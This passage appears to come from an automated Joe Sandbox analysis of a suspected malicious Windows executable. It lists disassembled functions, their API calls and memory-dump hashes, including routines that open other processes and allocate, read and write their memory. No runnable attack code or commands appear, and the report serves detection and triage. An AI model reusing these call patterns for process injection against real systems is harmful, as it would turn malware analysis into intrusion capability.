                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3897988419-0
                                                                                                                                                                              • Opcode ID: ef00a58887ced46dc6e35659fd7c553e6c6426c32f4c5b9d792e8b2189744524
                                                                                                                                                                              • Instruction ID: 207d7ce255433a5c90a85e74323e31a128bec81dbdaa84eee6cdf48abec0e4f5
                                                                                                                                                                              • Opcode Fuzzy Hash: ef00a58887ced46dc6e35659fd7c553e6c6426c32f4c5b9d792e8b2189744524
                                                                                                                                                                              • Instruction Fuzzy Hash: 05018F76600204BFDB106F66EC44B9ABBBDFF44352F104026F901D2310D774ED599BA2
                                                                                                                                                                              Function 004EB7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004EB806
                                                                                                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004EB810
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004EB81F
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004EB826
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004EB83C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 44706859-0
                                                                                                                                                                              • Opcode ID: 44077a303f8c39a21dd630f20c7f36d462e17af7e33eadfe4dbdaf4a2824a5c4
                                                                                                                                                                              • Instruction ID: 546ece94e88cfef5a160ad84c406275f038266d4588bec0d43574ac8508a4181
                                                                                                                                                                              • Opcode Fuzzy Hash: 44077a303f8c39a21dd630f20c7f36d462e17af7e33eadfe4dbdaf4a2824a5c4
                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF03775200204AFEB212FA6FC88A6B3B7CFF4AB55B00002AF941C6350DB659855EAB0
                                                                                                                                                                              Function 004EB78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004EB7A5
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004EB7AF
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004EB7BE
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004EB7C5
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004EB7DB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 44706859-0
                                                                                                                                                                              • Opcode ID: 609c6e5673711b66a1f4535cfc7211f62687854400b9d0f913cdb36b884bf7d4
                                                                                                                                                                              • Instruction ID: 51510b96942e7c399c8872f0d33c50fd29dcd35c7342cf8924b35da3603d2c30
                                                                                                                                                                              • Opcode Fuzzy Hash: 609c6e5673711b66a1f4535cfc7211f62687854400b9d0f913cdb36b884bf7d4
                                                                                                                                                                              • Instruction Fuzzy Hash: A3F08C312402446FEB110FA5EC88E677BBCFF96B56B00001AF901C6250DB719C05DAB0
                                                                                                                                                                              Function 004EFA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 004EFA8F
                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 004EFAA6
                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 004EFABE
                                                                                                                                                                              • KillTimer.USER32(?,0000040A), ref: 004EFADA
                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 004EFAF4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3741023627-0
                                                                                                                                                                              • Opcode ID: 2895a4c2b5fdb75543a10a5029e22add46fa0b18fd70642352953f0995a70166
                                                                                                                                                                              • Instruction ID: b424cafb8adcd7d456215df16d480bb8fbd92d434a23a37cbd05cb8971d0ec4d
                                                                                                                                                                              • Opcode Fuzzy Hash: 2895a4c2b5fdb75543a10a5029e22add46fa0b18fd70642352953f0995a70166
                                                                                                                                                                              • Instruction Fuzzy Hash: FA018631500744ABEB209B11ED4EB9677BCBF1070AF04017AB147A92E0DBF4A94C9A64
                                                                                                                                                                              Function 004CB517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • EndPath.GDI32(?), ref: 004CB526
                                                                                                                                                                              • StrokeAndFillPath.GDI32(?,?,0052F583,00000000,?), ref: 004CB542
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 004CB555
                                                                                                                                                                              • DeleteObject.GDI32 ref: 004CB568
                                                                                                                                                                              • StrokePath.GDI32(?), ref: 004CB583
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2625713937-0
                                                                                                                                                                              • Opcode ID: fb56a99b0bad819eb215e4a2c6a1779a56b9ba95d1fa2002d7fd24e35adf051a
                                                                                                                                                                              • Instruction ID: 7a2057d7f8fc94ef36ce3bc5834bd776d38b596fd0367718330d5b07b707949e
                                                                                                                                                                              • Opcode Fuzzy Hash: fb56a99b0bad819eb215e4a2c6a1779a56b9ba95d1fa2002d7fd24e35adf051a
                                                                                                                                                                              • Instruction Fuzzy Hash: 34F01934000A04ABCB555F28FC0DB653FF5E721326F088259E4A9442F0D73589DAFF59
                                                                                                                                                                              Function 004FFA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 004FFAB2
                                                                                                                                                                              • CoCreateInstance.OLE32(0053DA7C,00000000,00000001,0053D8EC,?), ref: 004FFACA
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 004FFD2D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                                              • String ID: .lnk
                                                                                                                                                                              • API String ID: 2683427295-24824748
                                                                                                                                                                              • Opcode ID: 06bb350b24bd66b4f3c0bf04553f31ba191537a2799994979e4459a01423c11b
                                                                                                                                                                              • Instruction ID: 17c19c60fd0f929bd2d9e789e2538275a3e4fb7b2a3f9038962b3363abd4de47
                                                                                                                                                                              • Opcode Fuzzy Hash: 06bb350b24bd66b4f3c0bf04553f31ba191537a2799994979e4459a01423c11b
                                                                                                                                                                              • Instruction Fuzzy Hash: 9EA17E71504205AFC300EF65C881EABB7FDEF88708F00491EF55587192EBB4EA09CBA6
                                                                                                                                                                              Function 004CDA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: #$+
                                                                                                                                                                              • API String ID: 0-2552117581
                                                                                                                                                                              • Opcode ID: 3d1500d1bb697d2b8861043a2476c47745273ebc5894393d7443f84e962e9435
                                                                                                                                                                              • Instruction ID: 6ebfa2f19158443cbf1fd8f25ca2eead4bddcec33baf451f7e06727226c17dcc
                                                                                                                                                                              • Opcode Fuzzy Hash: 3d1500d1bb697d2b8861043a2476c47745273ebc5894393d7443f84e962e9435
                                                                                                                                                                              • Instruction Fuzzy Hash: A0510239904265CFDB15DF69D440BFA7BA4BF26310F14406AF8519B2D0E738AC86CB25
                                                                                                                                                                              Function 004F503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0054DC40,?,0000000F,0000000C,00000016,0054DC40,?), ref: 004F507B
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                                • Part of subcall function 004BB8A7: _memmove.LIBCMT ref: 004BB8FB
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 004F50FB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                                                                              • String ID: REMOVE$THIS
                                                                                                                                                                              • API String ID: 2528338962-776492005
                                                                                                                                                                              • Opcode ID: e88a1a63b2dc70ffb507867af55f7c56b7819228571371d885f596d255507abb
                                                                                                                                                                              • Instruction ID: 3088a64d7e7253a162fc8304403b2b3bbea9e639fc0ac41825eb525a3852d0f6
                                                                                                                                                                              • Opcode Fuzzy Hash: e88a1a63b2dc70ffb507867af55f7c56b7819228571371d885f596d255507abb
                                                                                                                                                                              • Instruction Fuzzy Hash: 64418674A006099FCF10EF55C981BBEB7B5BF48308F04805EE6569B392D738AD46CB55
                                                                                                                                                                              Function 004ECF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004F4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004EC9FE,?,?,00000034,00000800,?,00000034), ref: 004F4D6B
                                                                                                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004ECFC9
                                                                                                                                                                                • Part of subcall function 004F4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004ECA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 004F4D36
                                                                                                                                                                                • Part of subcall function 004F4C65: GetWindowThreadProcessId.USER32(?,?), ref: 004F4C90
                                                                                                                                                                                • Part of subcall function 004F4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004EC9C2,00000034,?,?,00001004,00000000,00000000), ref: 004F4CA0
                                                                                                                                                                                • Part of subcall function 004F4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004EC9C2,00000034,?,?,00001004,00000000,00000000), ref: 004F4CB6
                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004ED036
                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004ED083
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 4150878124-2766056989
                                                                                                                                                                              • Opcode ID: f7f813f49b3fc29fff1086f5ec1559d929bb18d224f0dd3742adadd084179e12
                                                                                                                                                                              • Instruction ID: 21aceaac69b9941f7e9ae911cac0bd378385d363bbc86f19bd88793450072967
                                                                                                                                                                              • Opcode Fuzzy Hash: f7f813f49b3fc29fff1086f5ec1559d929bb18d224f0dd3742adadd084179e12
                                                                                                                                                                              • Instruction Fuzzy Hash: 4C416C7290021CAEDB10DFA4CC81AEFB7B8EF49704F04409AEA55B7291CA746E45CB64
                                                                                                                                                                              Function 0051A44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0054DBF0,00000000,?,?,?,?), ref: 0051A4E6
                                                                                                                                                                              • GetWindowLongW.USER32 ref: 0051A503
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0051A513
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long
                                                                                                                                                                              • String ID: SysTreeView32
                                                                                                                                                                              • API String ID: 847901565-1698111956
                                                                                                                                                                              • Opcode ID: 056392505b7f366a77666a4481cf3f022a4604bd9dc0c363881967c102564564
                                                                                                                                                                              • Instruction ID: 27394786b2b722c8c60533547c54da31972d99baffdef47e4786097636d27321
                                                                                                                                                                              • Opcode Fuzzy Hash: 056392505b7f366a77666a4481cf3f022a4604bd9dc0c363881967c102564564
                                                                                                                                                                              • Instruction Fuzzy Hash: C331D235201605AFEF129E38CC45BE67BA9FB49338F214719F875932E0C774E8A0AB51
                                                                                                                                                                              Function 005057D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 005057E7
                                                                                                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0050581D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CrackInternet_memset
                                                                                                                                                                              • String ID: ?KP$|
                                                                                                                                                                              • API String ID: 1413715105-1839330679
                                                                                                                                                                              • Opcode ID: 06f757cfb44d002ec8c58d91b1e7ec5a2499b07378dbb77a86ba800ff96c7580
                                                                                                                                                                              • Instruction ID: 9ecf2896b58f868fd4650635d82d6107214ce82dfadcaf73d88e16abec920632
                                                                                                                                                                              • Opcode Fuzzy Hash: 06f757cfb44d002ec8c58d91b1e7ec5a2499b07378dbb77a86ba800ff96c7580
                                                                                                                                                                              • Instruction Fuzzy Hash: 35311871C00119EBCF11AFA1CC95AEFBFB9FF18344F10801AF815A6162EA359A06DB64
                                                                                                                                                                              Function 0051A698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0051A74F
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0051A75D
                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0051A764
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                                                                                                              • String ID: msctls_updown32
                                                                                                                                                                              • API String ID: 4014797782-2298589950
                                                                                                                                                                              • Opcode ID: f81144b328c2668f7bd158f081551aa9653f6194556104f9cd5b898212b847e4
                                                                                                                                                                              • Instruction ID: 911e9b7b34e0d7ed8fbf67c59a619cf0f21ca725fb3d55e1311b2e7f5a75a767
                                                                                                                                                                              • Opcode Fuzzy Hash: f81144b328c2668f7bd158f081551aa9653f6194556104f9cd5b898212b847e4
                                                                                                                                                                              • Instruction Fuzzy Hash: 9921DEB5600605AFEB01DF28DCC1EA73BBCFB9A394B040009F9059B391CB70EC51DA61
                                                                                                                                                                              Function 005197B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0051983D
                                                                                                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0051984D
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00519872
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$MoveWindow
                                                                                                                                                                              • String ID: Listbox
                                                                                                                                                                              • API String ID: 3315199576-2633736733
                                                                                                                                                                              • Opcode ID: f9f3cd723e16b91658b251a842fe812c679b4bf33bfe5c2dd14963d435fde6eb
                                                                                                                                                                              • Instruction ID: 09cfa4b96b5a806041b368e42733e283c6fcc279bc5a06ce721eb7596a6b7e40
                                                                                                                                                                              • Opcode Fuzzy Hash: f9f3cd723e16b91658b251a842fe812c679b4bf33bfe5c2dd14963d435fde6eb
                                                                                                                                                                              • Instruction Fuzzy Hash: C421D032610118BBEB118F54DC85FEB3BAAFF8A754F018128F9159B190C6719C919BA0
                                                                                                                                                                              Function 0051A217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0051A27B
                                                                                                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0051A290
                                                                                                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0051A29D
